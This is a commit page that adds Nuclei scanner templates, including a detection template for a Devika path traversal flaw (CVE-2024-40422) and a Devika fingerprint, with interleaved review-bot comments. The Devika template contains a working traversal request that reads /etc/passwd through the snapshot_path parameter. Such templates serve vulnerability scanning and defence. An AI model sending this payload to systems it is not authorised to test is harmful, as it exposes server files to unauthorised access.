Auto Update Nuclei [Fri Aug 9 01:16:36 UTC 2024] :robot:
actions-user committed Aug 9, 2024
1 parent 2fe7678 commit 81fe54c
Showing 3 changed files with 87 additions and 1 deletion.
2 changes: 1 addition & 1 deletion plugins/apache/ofbiz/CVE-2024-38856.yaml
Expand Up @@ -19,7 +19,7 @@ info:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,ofbiz,apache,rce
tags: cve,cve2024,ofbiz,apache,rce,kev

http:
- raw:
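Review bot: the `kev` tag added to `tags` has nothing in the visible metadata that records why it applies. The lines around it carry only `verified`, `max-request` and `fofa-query`, and the commit message is an automated update stamp. If the template's `reference` list does not already cite the known-exploited-vulnerabilities listing this tag stands for, add that entry in the same change so the tag can be audited later.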
66 changes: 66 additions & 0 deletions plugins/stitionai/devika/CVE-2024-40422.yaml
@@ -0,0 +1,66 @@
id: CVE-2024-40422

info:
name: Devika v1 - Path Traversal
author: securityforeveryone,alpernae
severity: critical
description: |
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-40422
- https://cvefeed.io/vuln/detail/CVE-2024-40422
- https://github.com/alpernae/CVE-2024-40422
- https://github.com/stitionai/devika
- https://www.exploit-db.com/exploits/52066
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-40422
cwe-id: CWE-22
epss-score: 0.0087
epss-percentile: 0.82513
cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: stitionai
product: devika
fofa-query: icon_hash="-1429839495"
tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
- raw:
- |
GET /api/data HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true

- raw:
- |
GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'

- type: word
part: header
words:
- 'application/octet-stream'

- type: status
status:
- 200
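Review bot: `max-request: 1` under `metadata` does not match the template body, which sends two requests (`GET /api/data`, then `GET /api/get-browser-snapshot`) chained by `flow: http(1) && http(2)`; set it to 2 so request budgeting and scan reporting stay accurate. The `/api/data` gate also requires all four strings `models`, `projects`, `OPENAI` and `OLLAMA` in the body, so an instance whose response lacks any one of them is skipped and the snapshot check never runs. Either note that dependency in `description` or relax the gate to the keys that are always present, to avoid silent false negatives.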
20 changes: 20 additions & 0 deletions web-fingerprint/stitionai/devika.yaml
@@ -0,0 +1,20 @@
id: devika
info:
name: devika
author: cn-kali-team
tags: detect,tech,devika
severity: info
metadata:
fofa-query:
- icon_hash="-1429839495"
product: devika
vendor: stitionai
verified: true
http:
- method: GET
path:
- '{{BaseURL}}/'
matchers:
- type: favicon
hash:
- '-1429839495'
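Review bot: the only matcher is the favicon hash `'-1429839495'`, so identification rests on a single signal that changes whenever the icon is replaced or reused by another product. Add a second matcher on the response itself; the CVE-2024-40422 template in this same commit already identifies the application by the JSON keys returned from `/api/data`, which could be reused here. The hash is also written twice, in `metadata.fofa-query` and in `matchers.hash`, and the `info` block has no `description`; keep the two hash values in sync and add a short description of what is being detected.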
